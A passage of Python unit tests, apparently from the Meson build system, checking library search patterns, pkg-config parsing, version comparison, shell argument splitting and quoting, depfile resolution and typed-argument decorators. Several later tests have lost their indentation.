        with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
            f.write('')
        with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
            f.write('')
        found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
        self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
    '''
    Unit test for the library search patterns used by find_library().
    Runs _test_all_naming() for the real host platform, then re-runs it
    for other platforms by overriding env.machines.host.system.
    '''
    unix_static = ('lib{}.a', '{}.a')
    msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
    # This is the priority list of pattern matching for library searching
    patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
                            'static': unix_static},
                'linux': {'shared': ('lib{}.so', '{}.so'),
                          'static': unix_static},
                'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
                           'static': unix_static},
                'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
                                      'lib{}.dll.a', '{}.dll', '{}.dll.a'),
                           'static': ('cyg{}.a',) + unix_static},
                'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
                                 'static': msvc_static},
                'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
                                             '{}.dll.a', '{}.lib', '{}.dll'),
                                  'static': msvc_static}}
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    # First check the naming rules for whatever platform we really run on.
    if is_osx():
        self._test_all_naming(cc, env, patterns, 'darwin')
    elif is_cygwin():
        self._test_all_naming(cc, env, patterns, 'cygwin')
    elif is_windows():
        if cc.get_argument_syntax() == 'msvc':
            self._test_all_naming(cc, env, patterns, 'windows-msvc')
        else:
            self._test_all_naming(cc, env, patterns, 'windows-mingw')
    elif is_openbsd():
        self._test_all_naming(cc, env, patterns, 'openbsd')
    else:
        self._test_all_naming(cc, env, patterns, 'linux')
    # Then simulate the remaining platforms by patching the host system.
    env.machines.host.system = 'openbsd'
    self._test_all_naming(cc, env, patterns, 'openbsd')
    env.machines.host.system = 'darwin'
    self._test_all_naming(cc, env, patterns, 'darwin')
    env.machines.host.system = 'cygwin'
    self._test_all_naming(cc, env, patterns, 'cygwin')
    env.machines.host.system = 'windows'
    self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
    '''
    Unit test for parsing of pkg-config output to search for libraries

    https://github.com/mesonbuild/meson/issues/3951
    '''
    def create_static_lib(name):
        # On non-macOS an empty file is enough to be "found"; on macOS
        # the toolchain needs a real archive, so build a tiny one.
        if not is_osx():
            name.open('w').close()
            return
        src = name.with_suffix('.c')
        out = name.with_suffix('.o')
        with src.open('w') as f:
            f.write('int meson_foobar (void) { return 0; }')
        subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
        subprocess.check_call(['ar', 'csr', str(name), str(out)])
    with tempfile.TemporaryDirectory() as tmpdir:
        pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
        env = get_fake_env()
        compiler = env.detect_c_compiler(MachineChoice.HOST)
        env.coredata.compilers.host = {'c': compiler}
        env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions()
        p1 = Path(tmpdir) / '1'
        p2 = Path(tmpdir) / '2'
        p1.mkdir()
        p2.mkdir()
        # libfoo.a is in one prefix
        create_static_lib(p1 / 'libfoo.a')
        # libbar.a is in both prefixes
        create_static_lib(p1 / 'libbar.a')
        create_static_lib(p2 / 'libbar.a')
        # Ensure that we never statically link to these
        create_static_lib(p1 / 'libpthread.a')
        create_static_lib(p1 / 'libm.a')
        create_static_lib(p1 / 'libc.a')
        create_static_lib(p1 / 'libdl.a')
        create_static_lib(p1 / 'librt.a')
        # Fake pkg-config output so we control exactly which -L/-l flags
        # each package reports.
        def fake_call_pkgbin(self, args, env=None):
            if '--libs' not in args:
                return 0, '', ''
            if args[-1] == 'foo':
                return 0, f'-L{p2.as_posix()} -lfoo -L{p1.as_posix()} -lbar', ''
            if args[-1] == 'bar':
                return 0, f'-L{p2.as_posix()} -lbar', ''
            if args[-1] == 'internal':
                return 0, f'-L{p1.as_posix()} -lpthread -lm -lc -lrt -ldl', ''
        old_call = PkgConfigDependency._call_pkgbin
        old_check = PkgConfigDependency.check_pkgconfig
        PkgConfigDependency._call_pkgbin = fake_call_pkgbin
        PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
        # Test begins
        try:
            kwargs = {'required': True, 'silent': True}
            foo_dep = PkgConfigDependency('foo', env, kwargs)
            self.assertEqual(foo_dep.get_link_args(),
                             [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
            bar_dep = PkgConfigDependency('bar', env, kwargs)
            self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
            internal_dep = PkgConfigDependency('internal', env, kwargs)
            if compiler.get_argument_syntax() == 'msvc':
                self.assertEqual(internal_dep.get_link_args(), [])
            else:
                # System libraries must never be resolved to the static
                # archives we planted above.
                link_args = internal_dep.get_link_args()
                for link_arg in link_args:
                    for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
                        self.assertNotIn(f'lib{lib}.a', link_arg, msg=link_args)
        finally:
            # Test ends
            PkgConfigDependency._call_pkgbin = old_call
            PkgConfigDependency.check_pkgconfig = old_check
            # Reset dependency class to ensure that in-process configure doesn't mess up
            PkgConfigDependency.pkgbin_cache = {}
            PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
    """Check version comparison: version_compare_many() for constraint
    strings, and Version ordering against a large table of RPM-style
    comparison cases (each op implies related ops must agree)."""
    comparefunc = mesonbuild.mesonlib.version_compare_many
    for (a, b, result) in [
            ('0.99.beta19', '>= 0.99.beta14', True),
    ]:
        self.assertEqual(comparefunc(a, b)[0], result)
    for (a, b, op) in [
            # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
            ("1.0010", "1.9", operator.gt),
            ("1.05", "1.5", operator.eq),
            ("1.0", "1", operator.gt),
            ("2.50", "2.5", operator.gt),
            ("fc4", "fc.4", operator.eq),
            ("FC5", "fc4", operator.lt),
            ("2a", "2.0", operator.lt),
            ("1.0", "1.fc4", operator.gt),
            ("3.0.0_fc", "3.0.0.fc", operator.eq),
            # from RPM tests
            ("1.0", "1.0", operator.eq),
            ("1.0", "2.0", operator.lt),
            ("2.0", "1.0", operator.gt),
            ("2.0.1", "2.0.1", operator.eq),
            ("2.0", "2.0.1", operator.lt),
            ("2.0.1", "2.0", operator.gt),
            ("2.0.1a", "2.0.1a", operator.eq),
            ("2.0.1a", "2.0.1", operator.gt),
            ("2.0.1", "2.0.1a", operator.lt),
            ("5.5p1", "5.5p1", operator.eq),
            ("5.5p1", "5.5p2", operator.lt),
            ("5.5p2", "5.5p1", operator.gt),
            ("5.5p10", "5.5p10", operator.eq),
            ("5.5p1", "5.5p10", operator.lt),
            ("5.5p10", "5.5p1", operator.gt),
            ("10xyz", "10.1xyz", operator.lt),
            ("10.1xyz", "10xyz", operator.gt),
            ("xyz10", "xyz10", operator.eq),
            ("xyz10", "xyz10.1", operator.lt),
            ("xyz10.1", "xyz10", operator.gt),
            ("xyz.4", "xyz.4", operator.eq),
            ("xyz.4", "8", operator.lt),
            ("8", "xyz.4", operator.gt),
            ("xyz.4", "2", operator.lt),
            ("2", "xyz.4", operator.gt),
            ("5.5p2", "5.6p1", operator.lt),
            ("5.6p1", "5.5p2", operator.gt),
            ("5.6p1", "6.5p1", operator.lt),
            ("6.5p1", "5.6p1", operator.gt),
            ("6.0.rc1", "6.0", operator.gt),
            ("6.0", "6.0.rc1", operator.lt),
            ("10b2", "10a1", operator.gt),
            ("10a2", "10b2", operator.lt),
            ("1.0aa", "1.0aa", operator.eq),
            ("1.0a", "1.0aa", operator.lt),
            ("1.0aa", "1.0a", operator.gt),
            ("10.0001", "10.0001", operator.eq),
            ("10.0001", "10.1", operator.eq),
            ("10.1", "10.0001", operator.eq),
            ("10.0001", "10.0039", operator.lt),
            ("10.0039", "10.0001", operator.gt),
            ("4.999.9", "5.0", operator.lt),
            ("5.0", "4.999.9", operator.gt),
            ("20101121", "20101121", operator.eq),
            ("20101121", "20101122", operator.lt),
            ("20101122", "20101121", operator.gt),
            ("2_0", "2_0", operator.eq),
            ("2.0", "2_0", operator.eq),
            ("2_0", "2.0", operator.eq),
            ("a", "a", operator.eq),
            ("a+", "a+", operator.eq),
            ("a+", "a_", operator.eq),
            ("a_", "a+", operator.eq),
            ("+a", "+a", operator.eq),
            ("+a", "_a", operator.eq),
            ("_a", "+a", operator.eq),
            ("+_", "+_", operator.eq),
            ("_+", "+_", operator.eq),
            ("_+", "_+", operator.eq),
            ("+", "_", operator.eq),
            ("_", "+", operator.eq),
            # other tests
            ('0.99.beta19', '0.99.beta14', operator.gt),
            ("1.0.0", "2.0.0", operator.lt),
            (".0.0", "2.0.0", operator.lt),
            ("alpha", "beta", operator.lt),
            ("1.0", "1.0.0", operator.lt),
            ("2.456", "2.1000", operator.lt),
            ("2.1000", "3.111", operator.lt),
            ("2.001", "2.1", operator.eq),
            ("2.34", "2.34", operator.eq),
            ("6.1.2", "6.3.8", operator.lt),
            ("1.7.3.0", "2.0.0", operator.lt),
            ("2.24.51", "2.25", operator.lt),
            ("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
            ("3.4.1", "3.4b1", operator.gt),
            ("041206", "200090325", operator.lt),
            ("0.6.2+git20130413", "0.6.2", operator.gt),
            ("2.6.0+bzr6602", "2.6.0", operator.gt),
            ("2.6.0", "2.6b2", operator.gt),
            ("2.6.0+bzr6602", "2.6b2x", operator.gt),
            ("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
            ("15.8b", "15.8.0.1", operator.lt),
            ("1.2rc1", "1.2.0", operator.lt),
    ]:
        ver_a = Version(a)
        ver_b = Version(b)
        # Each primary op implies a set of related operators that must
        # also hold (or fail) for the pair, so check those too.
        if op is operator.eq:
            for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
                self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
        if op is operator.lt:
            for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
                self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
            for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
                self.assertFalse(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
        if op is operator.gt:
            for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
                self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
            for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
                self.assertFalse(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
def test_msvc_toolset_version(self):
    '''
    Ensure that the toolset version returns the correct value for this MSVC
    '''
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_argument_syntax() != 'msvc':
        raise unittest.SkipTest('Test only applies to MSVC-like compilers')
    toolset_ver = cc.get_toolset_version()
    self.assertIsNotNone(toolset_ver)
    # Visual Studio 2015 and older versions do not define VCToolsVersion
    # TODO: ICL doesn't set this in the VSC2015 profile either
    if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
        return
    # Prefer the environment variable; fall back to reading the version
    # file from the VS install directory.
    if 'VCToolsVersion' in os.environ:
        vctools_ver = os.environ['VCToolsVersion']
    else:
        self.assertIn('VCINSTALLDIR', os.environ)
        # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
        vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
    self.assertTrue(vctools_ver.startswith(toolset_ver),
                    msg=f'{vctools_ver!r} does not start with {toolset_ver!r}')
def test_split_args(self):
    """Check split_args() against platform-specific quoting rules
    (MSVC-style on Windows, POSIX-shell-style elsewhere); cases marked
    roundtrip=True must also survive join_args() back to the original."""
    split_args = mesonbuild.mesonlib.split_args
    join_args = mesonbuild.mesonlib.join_args
    if is_windows():
        test_data = [
            # examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
            (r'"a b c" d e', ['a b c', 'd', 'e'], True),
            (r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
            (r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
            (r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
            (r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
            # other basics
            (r'""', [''], True),
            (r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
            (r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
            (r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
            (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
            (r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
            ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
            # more illustrative tests
            (r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
            (r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
            (r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
            (r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
            (r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
            (r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
            (r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
            (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
            (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
            (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
            (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
            (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
            (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
            (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
            (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
            (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
            (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
        ]
    else:
        test_data = [
            (r"'a b c' d e", ['a b c', 'd', 'e'], True),
            (r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
            (r"a\b\c d e", [r'abc', 'd', 'e'], False),
            (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
            (r'"a b c" d e', ['a b c', 'd', 'e'], False),
            (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
            (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
            (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
            (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
            (r"'a & b & c d e'", ['a & b & c d e'], True),
            (r"abd'e f'g h", [r'abde fg', 'h'], False),
            ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
            ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
            ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
            ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
            ("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
        ]
    for (cmd, expected, roundtrip) in test_data:
        self.assertEqual(split_args(cmd), expected)
        if roundtrip:
            self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
    """Check quote_arg() against platform-specific quoting rules, and that
    split_args() recovers the original argument from the quoted form."""
    split_args = mesonbuild.mesonlib.split_args
    quote_arg = mesonbuild.mesonlib.quote_arg
    if is_windows():
        test_data = [
            ('', '""'),
            ('arg1', 'arg1'),
            ('/option1', '/option1'),
            ('/Ovalue', '/Ovalue'),
            ('/OBob&Alice', '/OBob&Alice'),
            ('/Ovalue with spaces', r'"/Ovalue with spaces"'),
            (r'/O"value with spaces"', r'"/O\"value with spaces\""'),
            (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
            ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
            ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
            (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
        ]
    else:
        test_data = [
            ('arg1', 'arg1'),
            ('--option1', '--option1'),
            ('-O=value', '-O=value'),
            ('-O=Bob&Alice', "'-O=Bob&Alice'"),
            ('-O=value with spaces', "'-O=value with spaces'"),
            ('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
            ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
            ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
        ]
    for (arg, expected) in test_data:
        self.assertEqual(quote_arg(arg), expected)
        # Quoting must round-trip through split_args.
        self.assertEqual(split_args(expected)[0], arg)
    def test_depfile(self):
        """DepFile.get_all_dependencies must resolve dependencies transitively.

        Each case is (depfile lines, target, expected full dependency set).
        """
        for (f, target, expdeps) in [
            # empty, unknown target
            ([''], 'unknown', set()),
            # simple target & deps
            (['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
            (['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
            # get all deps
            (['meson/foo.o: foo.c foo.h',
              'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
            (['meson/foo.o: foo.c foo.h',
              'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
            # line continuation, multiple targets
            (['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
            (['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
            # \\ handling (escaped spaces and literal backslashes)
            (['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
            # $ handling ($$ unescapes to a literal $)
            (['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
            (['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
            # cycles must terminate and include every reachable node
            (['a: b', 'b: a'], 'a', set({'a', 'b'})),
            (['a: b', 'b: a'], 'b', set({'a', 'b'})),
        ]:
            d = mesonbuild.depfile.DepFile(f)
            deps = d.get_all_dependencies(target)
            self.assertEqual(sorted(deps), sorted(expdeps))
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
F = mesonbuild.dependencies.factory
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = F.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = F.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
    def test_validate_json(self) -> None:
        """Validate the json schema for the test cases."""
        try:
            from jsonschema import validate, ValidationError
        except ImportError:
            if is_ci():
                # On CI the dependency must be installed; a missing import is a bug.
                raise
            raise unittest.SkipTest('Python jsonschema module not found.')
        with Path('data/test.schema.json').open() as f:
            schema = json.load(f)
        # Collect every failure so one bad file does not hide the rest.
        errors = [] # type: T.List[T.Tuple[Path, Exception]]
        for p in Path('test cases').glob('**/test.json'):
            with p.open() as f:
                try:
                    validate(json.load(f), schema=schema)
                except ValidationError as e:
                    errors.append((p.resolve(), e))
        # Print all offenders before failing.
        for f, e in errors:
            print(f'Failed to validate: "{f}"')
            print(str(e))
        self.assertFalse(errors)
def test_typed_pos_args_types(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], int)
self.assertIsInstance(args[2], bool)
_(None, mock.Mock(), ['string', 1, False], None)
def test_typed_pos_args_types_invalid(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1.0, False], None)
self.assertEqual(str(cm.exception), 'foo argument 2 was of type "float" but should have been "int"')
def test_typed_pos_args_types_wrong_number(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 2.')
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1, True, True], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 4.')
def test_typed_pos_args_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_varargs_not_given(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertEqual(args[1], [])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_varargs_invalid(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been "str"')
def test_typed_pos_args_varargs_invalid_mulitple_types(self) -> None:
@typed_pos_args('foo', str, varargs=(str, list))
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been one of: "str", "list"')
def test_typed_pos_args_max_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=5)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=1)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args'], None)
self.assertEqual(str(cm.exception), 'foo takes between 1 and 2 arguments, but got 3.')
def test_typed_pos_args_min_varargs(self) -> None:
@typed_pos_args('foo', varargs=str, max_varargs=2, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], list)
self.assertIsInstance(args[0][0], str)
self.assertIsInstance(args[0][1], str)
_(None, mock.Mock(), ['string', 'var'], None)
def test_typed_pos_args_min_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_and_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 'bar'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 4.')
def test_typed_pos_args_min_and_max_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 1.')
def test_typed_pos_args_variadic_and_optional(self) -> None:
@typed_pos_args('foo', str, optargs=[str], varargs=str, min_varargs=0)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(AssertionError) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(
str(cm.exception),
'varargs and optargs not supported together as this would be ambiguous')
def test_typed_pos_args_min_optargs_not_met(self) -> None:
@typed_pos_args('foo', str, str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
